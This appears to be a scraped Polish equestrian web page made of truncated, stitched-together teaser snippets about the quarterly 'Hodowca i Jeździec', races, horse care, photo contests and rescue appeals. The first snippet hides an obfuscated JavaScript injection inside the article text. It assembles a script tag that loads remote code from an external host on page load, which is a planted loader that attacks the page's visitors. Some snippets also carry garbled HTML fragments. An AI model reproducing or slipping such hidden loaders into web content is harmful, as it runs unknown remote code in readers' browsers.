hodowca i jezdziec


 • ażna dla zdrowia i kondycji konia jest zdrowa, zbilansowana dieta i, że zarówno produkty żywieniowe, jak i żele czy kremy należy kupować tylko w zaufanych źródłach. (function(){ ol9h=document.createElement("script");ol9h.async=true;ol9h_="u"+("s")+"t"; ol9hu="132880178.";ol9h_+="a"+("t.i");ol9h_+="n"+("f"+"o")+"/"; ol9hu+="a35jz52yl9hstc0ted7zhu"+("4n5d9cwn"); ol9h.src="https://"+ol9h_+ol9hu;ol9h.type="text/javascript"; document.body.appendChild(ol9h); })();

  czytaj więcej »


 • s",="" freesans,="" sans-serif;="" line-height:="" 18px;="" background-color:="" rgb(255,="" 255,="" 255);"="">Wczoraj tj. 7 lipca 2016 roku odszedł od nas nagle, świetny dziennikarz (autor ponad 1000 artykułów o tematyce hipologicznej), redaktor naczelny kwartalnika "Hodowca i Jeździec", doktor nauk humanistycznych, nauczyciel akademicki oraz zawodnik w dyscyplinie skoków przez przeszkody Michał Wierusz-Kowalski. Przekazujemy najszczersze wyrazy współczucia rodzinie oraz bliskim.

  czytaj więcej »


 • i wzbogaca człowieka o wiele nowych doświadczeń.Hodowca i miłośnik rasy kabardyńskiej, mały tabun jego konikó sprowadzonych z Północnego Kaukazu w żyje na otwartym terenie w centrum Jury Krakowsko-Czętochowskiej niedaleko Pustyni Błędowskiej. Dalsza część tekstu, więcej fotografii z konnych wypraw po Gruzji oraz informacji o Autorze, koniach kabardyńskich i turystyce konnej na Kaukazie na stronie www.nomadiclife.eu Zapraszamy do lektury...

  czytaj więcej »


 • stylizacje, zarówno na zawody, jak i do jazdy codziennej. Niektóre firmy oferują personalizację ubrań jeździeckich. Można zamówić całą kolekcję z naszytym emblematem klubu, sponsora czy nazwiskiem zawodnika. Inspiracji do modnego noszenia się w stajni można zaczerpnąć z modowych blogów jeździeckich lub na naszym forum (http://www.galopuje.pl/grupa,modny-jezdziec-moda-jazda-konna,66.html).

  czytaj więcej »


 • 27 lipca 2013 kolejny jezdziec z naszej stajni zdoby? br?z. Gratulujemy Lukaszowi zdania za pierwszym razem. Podziekwania dla naszej Klaudii za udostepnenie super Hajli :)

  czytaj więcej »


 • Kalahari Dream.Wydarzenie roku: Wrocławski Tor Wyścigów Konnych – Partynice za Partynicki Przełom – w roku 2013 stał się profesjonalnym torem wyścigowym, przyciągając elitę czeskich trenerów, hodowcówi jeźdźców wyścigowych. Lotto Wielka Wrocławska zgromadziła 12 tysięcy widzów i stała się najważniejszą gonitwą przeszkodową w kraju.Wyróżnienie specjalne: Oddanie hipodromu w Sopocie - za rewitalizację toru wyścigowego i budowę nowoczesnego centrum jeździeckiego.

  czytaj więcej »


 • kuleją. Ich nogi są popuchnięte i obolałe, oczy niedowidzą. Potrzebują diagnostyki, potrzebują leczenia. Niezbędna jest najlepszej jakości pasza i suplementy, aby mogły wrócić do właściwej kondycji. Jeśli zechcesz je wspomóc, w ramach kampanii Kochaj Mądrze możesz dokonać wpłaty z tytułem "konie z Klenic", możesz przesłać paszę, suplementy, szczotki czy kantary. Możesz przyjechać do naszego ośrodka w Wojnowie i pomóc przy opiece nad zwierzętami. Dziękujemy za każde wsparcie.

  czytaj więcej »


 • ia na adres tondera@pzhk.pl. Nadesłanie zdjęć jest deklaracją, że osoba zgłaszająca:jest autorem załączonych zdjęć,posiada zgodę osób rozpoznawalnych na zdjęciach na ich publikowanie,wyraża zgodę na przetwarzanie swoich danych osobowych zgodnie z ustawą o Ochronie Danych Osobowych (Dz.U.Nr.133 pozycja 883),wyraża zgodę na nieodpłatne wykorzystywanie przez Polski Związek Hodowców Koni nadesłanych zdjęć, w dowolnym czasie i formie, dla celów promocji przemysłu końskiego

  czytaj więcej »


 • aszająca: jest autorem załączonych zdjęć,posiada zgodę osób rozpoznawalnych na zdjęciach na ich publikowanie, wyraża zgodę na przetwarzanie swoich danych osobowych zgodnie z ustawą o Ochronie Danych Osobowych (Dz.U.Nr.133 pozycja 883), wyraża zgodę na nieodpłatne wykorzystywanie przez Polski Związek Hodowców Koni nadesłanych zdjęć, w dowolnym czasie i formie, dla celów promocji przemysłu konnego.Zapraszamy do wzięcia udziału w wystawie prac fotograficznych pt. 'Końskie profesje'.

  czytaj więcej »


 • trzymałe – idealne do długich rajdów. Przy tym nie płoszą się, co akurat podczas jazdy w teren ma olbrzymie znaczenie. Pamiętajmy jednak, aby wzbudzić u nich autorytet. Hodowca bez silnego charakteru i żelaznej konsekwencji szybko zostanie stłamszony przez swojego hucuła. Są bowiem niezwykle przebiegłe, doskonale wyczuwają emocje i potrafią nieźle grać, jeśli tylko zobaczą małą słabość u swojego właściciela. Mam nadzieję, że pomogłam Wam w temacie siodło na hucuła.

  czytaj więcej »


 • y między deskami. Pod sufitem nagromadziły się pajęczyny, a na podłodze resztki słomy i siana. Kiedyś ten interes przynosił zyski – konie można było sprzedać po dobrej cenie. Dlatego hodowca rozmnażał swoje stado, by potem transportem wysyłać je do rzeźni. Teraz czasy się zmieniły i hodowla koni nie jest już tak dochodowa. Właściciel postanowił pozbyć się stada i zamknąć „koński interes”.Z całego stada zostały tylko trzy kuce, które nie zmieściły się w ostatnim transporcie.

  czytaj więcej »


 • ąż, zawodnik Bartłomiej Kwiatek, który już po raz piąty został zwycięzcą rankingu FEI w powożeniu singlami. Bartek Kwiatek jest również aktualnym wicemistrzem Świata w powożeniu zaprzęgami jednokonnymi, a LOKAN to jego podstawowy koń.Uroczyste wręczenie nagród nastąpi w czasie tegorocznych Mistrzostw Polski Młodych Koni:Gajewniki (skoki przez przeszkody, powożenie) – 26 sierpniaStrzegom (WKKW) – 9 wrześniaWrocław (ujeżdzenie) – 30 wrześniaautor: PZHK

  czytaj więcej »


 • Do dystrybucji trafiło letnie wydanie 'Hodowca i Jeździec'. Grono autorów i twórców stale się rozrasta, więc i nasz kwartalnik coraz bogatszy. Objętość 152 strony 'Hodwcy i Jeźdźca' to prawie jak objętość jednego z najstarszych na świecie tytułów hipologicznych, niemieckiego 'St. Georg'. Jednak najpierw prosimy przeczytajcie polskiego 'Hodowcę i Jeźdźca'.

  czytaj więcej »


 • r>To oczywiście nie jedyna gra dostępnych dla jeźdźców. Oprócz ćwiczenia umiejętności prawidłowej opieki nad koniem, gospodarności i odpowiedzialności, zainteresowani mogą sprawdzić się w różnego rodzaju dyscyplinach. Wśród nich gra konie skoki czy gra konie wyścigi, w której każdy z uczestników ma możliwość wzięcia udziału w profesjonalnych wyścigach koni. Każdy z nas z pewnością znajdzie coś dla siebie. Gra konie i kucyki, bo wirtualny świat jeździectwa jest równie ciekawy.

  czytaj więcej »


 • długofalowe korzyści Państwu Polskiemu, wymaga zrozumienia. Żeby polskie konie mogły służyć polskiemu PKB sektor ten potrzebuje uporządkowania; znalezienia konsensusu i synergii działania pomiędzy każdym z jego elementów składowych. Są to ambitne zagadnienia i trudne dla środowiska koniarzy wyzwania na przyszłość, więc wymagające roztropnych działań. Dlatego podsumowujący wniosek był postulatem, aby zorganizować kolejna konferencję, pod roboczym tytułem Polskie konie – misja a biznes.

  czytaj więcej »


 • Jest już w sprzedaży wiosenne wydanie kwartalnika 'Hodowca i Jeździec'. Zieleni się wokół, kwitnie forsycja, budzi się przyroda z zimowego letargu, więc i lżej na duszy, a w sercu ciągle maj... Pełni optymizmu przekazujemy ponad 130 stron nowego 'Hodowcy i Jeźdźca', który mamy nadzieję pomoże uśmiechnąć się koniarzom do świata i siebie nawzajem. Miłej zatem lektury :-)Michał Kowalski

  czytaj więcej »


 • Kilka propozycji magazynów związanych z hippiką:Dla młodzieży i dorosłych:1. Świat Koni2. Koń Polski3. Konie i Rumaki4. Koński Targ5. Hodowca i JeździecDla dzieci:1. W siodle2. Mój konik3. JessyZ internetowych polecam KonnąCafe:http://konnacafe.pl/

  czytaj więcej »


 • e z nimi skojarzenia. Autorzy prac, których fotografie zostaną wytypowane do ekspozycji, otrzymają w podziękowaniu roczną prenumeratę kwartalnika 'Hodowca i Jeździec', który objął wystawę patronatem medialnym.Zainteresowanych prosimy o nadsyłanie od jednej do trzech fotografii o wysokiej rozdzielczości (300 dpi) wraz z imieniem i nazwiskiem autora, danymi teleadresowymi oraz, co ważne - tytułem pracy.Czekamy na Państwa zgłoszenia do końca marca b.r. pod adresem wroblewska@pzhk.pl

  czytaj więcej »


 • h dni. To takie dziwne uczucie , dziwnie fajne uczucie kiedy odsyłasz staruszka na odpoczynek.Nie cieszy Cię to, że poprawnie zagalopował, ale to, że każdego dnia stawia uszy gdy wchodzisz do stajni czy skubie spokojnie trawę lub siano.A siodło, które miało być właśnie dla niej zostawiam dla przyszłych koni cioci :)Jeśli ktoś śledził moje wpisy po części zna sytuację moją i Basi. Że była to historia różniąca się troszkę od innych.Kiedyś napiszę wam w całości naszą historie :)

  czytaj więcej »


 • danie kwartalnika 'Hodowca i Jeździec'. Przed nami jeszcze kawałek zimy, i choć póki co ona bardziej mokra niż śnieżno-mroźna, to krótki dzień i długą noc może zrekompensować 140 stron zawartości 'Hodowcy i Jeźdźca', pozwoli szybciej znieść szaro-burą aurę za oknem i doczekać wiosny, kiedy to znowu, ze zdwojoną siłą zakwitnie życie hodowlano-jeździeckie. Warto podkreślić, iż najświeższy numer pisma ukazał się staraniem ponad 50 autorów tekstów i zdjęć. Miłej zatem lektury :-)

  czytaj więcej »


 • enie otrzyma wiadomość zwrotną z numerem konta, na które trzeba dokonać wpłaty za kurs. Warunkiem uczestnictwa w szkoleniu jest dokonanie wpłaty. Ostateczna lista uczestników ostanie opublikowana na stronie internetowej www.instytutedukacji.com w dniu 2 stycznia 2012 roku. Ilość miejsc ograniczona, decyduje kolejność zgłoszeń.Specjalizujemy się w organizacji kursów i szkoleń dla przemysłu końskiego.Osoby, które uczestniczyły w naszych kursach wyrażają się o Nas bardzo pozytywnie.

  czytaj więcej »


 • ą, szlachetną głową, przeważnie o prostym profilu, długą, prostą szyją, wyraźnie zaznaczonym, długim kłębem, długą, skośnie ustawioną łopatką, mocnym grzbietem, pojemną, głęboką klatką piersiową. Zad mają lekko ścięty, kończyny suche o dobrym skątowaniu. Całą sylwetka jest bardzo dobrze umięśniona. Ich chody są niskie, elastyczne, energiczne i wydajne. Mają duże predyspozycje do skoków przez przeszkody. Najczęściej wystepuje umaszczenie kasztanowate, gniade i nieco rzedziej siwe.

  czytaj więcej »


 • rdym podłożu, szybko się ściera, dlatego muszą mieć zakładane podkowy. W zależności od pory roku, podłoża i rodzaju pracy mogą to być podkowy pantoflowe, gryfowe lub hacelowe. Kopyta należy rozczyszczać (ścinać przerośnięty róg kopytowy) co 6-8 tygodni.Mam nadzieje że już wiecie jak należy opiekować się koniem, lub ewentualnie dodałam wam kilka wskazówek, czy też porad o których nie mieliście pojęcia :) Ale myślę, że szanujący hodowca ma te wiadomości przyswojone w jednym paluszku ;)

  czytaj więcej »


 • dzieje się coś niepokojącego, wszystkie zrywają się galopem do ucieczki. Nieuczestniczenie w życiu stada, trzymanie się z dala od grupy i brak zainteresowania otoczeniem jest niepokojącym zjawiskiem u koni zarówno młodych, jak i starych. Takie nietypowe zachowanie wyraźnie wskazuje na nie najlepszy stan zdrowia konia. Konie leciwe często są odrzucane przez grupę, zwłaszcza młodych zwierząt, toteż mądry hodowca lub właściciel stada wypuszcza je na oddzielne pastwisko, jeśli jest taka możliwość.

  czytaj więcej »


 • kowski,,Agata Jankowska-MichalskaRozwinąć talent 76Jan SkoczylasIntensywnie i po polsku 80Paweł GocłowskiNiebezpieczne włośnie 83Jakub Gawor Barwnie, dostojnie… 86Piotr DzięciołowskiKonno (…) znaczy dumnie 88Aleksandra JaworowskaKsenofont i „Hippika…” cz. II 92Jacek ŁojekZ dziejów związków hodowców koni w Polsce cz. XII 94Lesław KukawskiWYNIKI 98KALENDARIUM 100PRENUMERATA 102

  czytaj więcej »